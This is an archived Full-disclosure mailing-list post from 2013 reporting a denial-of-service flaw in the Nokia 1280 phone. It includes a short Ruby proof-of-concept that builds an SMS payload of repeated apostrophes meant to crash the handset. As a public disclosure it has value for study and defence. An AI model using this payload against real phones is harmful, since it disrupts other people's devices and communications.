[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Nokia 1280 DoS Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Nokia 1280 DoS Vulnerability
From: John Parker <unownsec@xxxxxxxxx>
Date: Wed, 3 Jul 2013 14:06:09 +0530

Dear Sir,

I found a DoS in Nokia 1280.
Video: http://www.youtube.com/watch?v=csLuNZ0mjpI

Thank You.
Un0wn_X

###########################################################################################################
#Exploit Title: Nokia 1280 DoS Vulnerability
#Author : Un0wn_X
#E-Mail : unownsec@xxxxxxxxx
#Date   : Monday, July 01,2013
#Product: http://www.nokia.com/in-en/phones/phone/nokia-1280/
###########################################################################################################

#Vulnerability Advisory
=======================
You can send a  SMS containing the malicious buffer and can crash the phone 
once it loads in the memory.

#Video PoC
============
http://www.youtube.com/watch?v=csLuNZ0mjpI

#Exploit
=========

#!/usr/bin/env ruby
#Author: Un0wn_X

begin
buff = "Don't Scroll Down :D \n\n"
buff += "'"*100

file = open("exploit.txt","w")
file.write(buff)
file.close()

puts "[+] Exploit created >> exploit.txt"
puts "[*] Now send the text contained inside the exploit.txt by a sms"
puts "[~] Un0wn_X"
end

#Final Notes
=============
I have no idea to attach this to a debugger and fuzz this system. You may 
exploit further

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [SECURITY] [DSA 2718-1] wordpress security update
Next by Date: Re: [Full-disclosure] Skype for Android Lockscreen Bypass
Previous by thread: [Full-disclosure] [SECURITY] [DSA 2718-1] wordpress security update
Next by thread: Re: [Full-disclosure] tor vulnerabilities?
Index(es):
- Date
- Thread